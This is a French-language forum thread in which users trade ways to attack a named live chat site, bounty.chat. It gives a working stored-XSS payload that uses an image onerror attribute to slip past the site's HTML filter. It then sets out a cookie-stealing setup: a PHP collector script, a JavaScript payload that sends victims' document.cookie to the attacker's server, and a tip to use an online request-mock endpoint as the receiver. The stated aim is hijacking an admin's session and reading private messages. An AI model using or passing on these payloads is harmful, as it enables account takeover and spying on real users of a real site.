InscriptionConnexion
Ahi...
:bras:

J'y suis allé pour tester après avoir vu des topics passer ici. (je les retrouverai et je vous citerai les kheys)

Quel site de merde, je me suis fais ban par l'admin!

C'est Chanel le modo.

En gros, vous pouvez exécuter de javascript directement sur le site en envoyant un message:
<img src="url-d-image-qui-bug.png https://url-d-image-qui-bug.png" onerror="alert('Quelle indignité!')" alt="

L'image charge une fausse URL et exécute le script de onerror.
A la fin, j'ouvre un attribut qui sera refermé par la prochaine double quote dans le code du site (sinon, les balises html complètes sont filtrées)
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
Merde, j'ai oublié l'URL
:sueur:

bounty.chat https://bounty.chat/
:pascal_encule:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
@lafindejvc Tu t'es fait insulté toi non ?
:WXCV10:


@esclavotaf Et toi ?
:pascal_bzez2:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
Aya on peut troll a la avenoel?
il y a 2 ans
EvoIa
EvoIa
2 ans
@lafindejvc Tu t'es fait insulté toi non ?
:WXCV10:


@esclavotaf Et toi ?
:pascal_bzez2:
Oui j'ai tellement de screenn sur les taray
il y a 2 ans



il y a 2 ans
EvoIa
EvoIa
2 ans
Ahi...
:bras:

J'y suis allé pour tester après avoir vu des topics passer ici. (je les retrouverai et je vous citerai les kheys)

Quel site de merde, je me suis fais ban par l'admin!

C'est Chanel le modo.

En gros, vous pouvez exécuter de javascript directement sur le site en envoyant un message:
<img src="url-d-image-qui-bug.png https://url-d-image-qui-bug.png" onerror="alert('Quelle indignité!')" alt="

L'image charge une fausse URL et exécute le script de onerror.
A la fin, j'ouvre un attribut qui sera refermé par la prochaine double quote dans le code du site (sinon, les balises html complètes sont filtrées)
Faut pas faire ce que j'écris ci dessous (sans précautions) parce que c'est illégal :


Fais une redirection pour voler les cookies des utilisateurs.

Il faut que tu ouvres un server web (apache par exemple) sur ta machine (idéalement un vps auquel tu peux accéder de façon anonyme ou proche)

Tu écris le script suivant qui se charge d'afficher le paramètre qu'il va recevoir (les cookies des victimes) :

getcookie.php

<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND);
?>


En suite pour le payload, tu vas juste remplacer l'alert par ceci :

window.location.href="ton-ip-de-serveur/getcookie.php?cookie="+document.cookie;



Les cookies des utilisateurs vont s'écrire dans le fichier cookies.txt de ta machine.

Et normalement tu as un cookie de session que tu peux réinjecter dans ton navigateur et usurper la session d'un admin par exemple...

Les possibilités d'exploitations sont larges.
:miaou:

il y a 2 ans
Faut pas faire ce que j'écris ci dessous (sans précautions) parce que c'est illégal :


Fais une redirection pour voler les cookies des utilisateurs.

Il faut que tu ouvres un server web (apache par exemple) sur ta machine (idéalement un vps auquel tu peux accéder de façon anonyme ou proche)

Tu écris le script suivant qui se charge d'afficher le paramètre qu'il va recevoir (les cookies des victimes) :

getcookie.php

<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND);
?>


En suite pour le payload, tu vas juste remplacer l'alert par ceci :

window.location.href="ton-ip-de-serveur/getcookie.php?cookie="+document.cookie;



Les cookies des utilisateurs vont s'écrire dans le fichier cookies.txt de ta machine.

Et normalement tu as un cookie de session que tu peux réinjecter dans ton navigateur et usurper la session d'un admin par exemple...

Les possibilités d'exploitations sont larges.
Pas besoin de t'emmerder, tu peux faire un mock d'API directement en ligne, par exemple ici:
app.beeceptor.com https://app.beeceptor.com/console/test123456789

Plus qu'à faire une requête sur test123456789.free.beeceptor.com https://test123456789.free.beeceptor.com et tu reçois les headers en temps réel.
:risialpha:


De là, il ne faudrait surtout pas avoir l'idée de sérialiser les cookies et de les envoyer en paramètre GET sur ce serveur, car ce serait i-llé-gal!
:Oussama_amar:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
T'as fais quoi mon khey ?
:zidane_lunettes_main:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
EvoIa
EvoIa
2 ans
Merde, j'ai oublié l'URL
:sueur:

bounty.chat https://bounty.chat/
:pascal_encule:
>vpn not allowed

un autre pot de miel ?
:chevalier_fume:
La meilleure façon de châtier les hommes est de toujours donner ce qu'ils réclament.
il y a 2 ans
Yoneda
Yoneda
2 ans
>vpn not allowed

un autre pot de miel ?
:chevalier_fume:
Ayaa les enculés
:cash_rage:

J'y suis resté 5min avant de me faire ban, j'ai pas testé avec tor
:issouffle:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
Y’a personne sur leurs site
Breton d’ultra droite !! #FreePalestine
il y a 2 ans
Bounty ?
il y a 2 ans
C'est qui le khey d'Audun-le-Tiche qui a cliqué sur le lien du mock ?
:Larry:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
Bounty ?
Oui, cette horreur codé avec une IA à tous les coups
:OSS_funny4:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
Y’a personne sur leurs site
Salon "photo / video / amateur" mais juste pour la blague, n'espère pas avoir des échanges avec de vraies humaines
:golem_abasourdi:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
EvoIa
EvoIa
2 ans
Oui, cette horreur codé avec une IA à tous les coups
:OSS_funny4:
On peut faire quelle genre de carabistouilles avec ce site mon cher monsieur ?

Image
il y a 2 ans
On peut faire quelle genre de carabistouilles avec ce site mon cher monsieur ?

Image
Bloquer la page chez tout le monde, les rediriger, voler leurs cookies, injecter un script (et là, tu peux tout faire, savoir ce qu'ils se disent en privé etc).
En bref, tout ce que tu peux coder
:OSS_funny4:
:jmlp-onche:
Cum My Fanatics
:pascal_nrv:
il y a 2 ans
Y a un clone déjà ?
il y a 2 ans
EvoIa
EvoIa
2 ans
Bloquer la page chez tout le monde, les rediriger, voler leurs cookies, injecter un script (et là, tu peux tout faire, savoir ce qu'ils se disent en privé etc).
En bref, tout ce que tu peux coder
:OSS_funny4:
Faut un peu toucher sa bille en informatique
:Nerdyzoom:
il y a 2 ans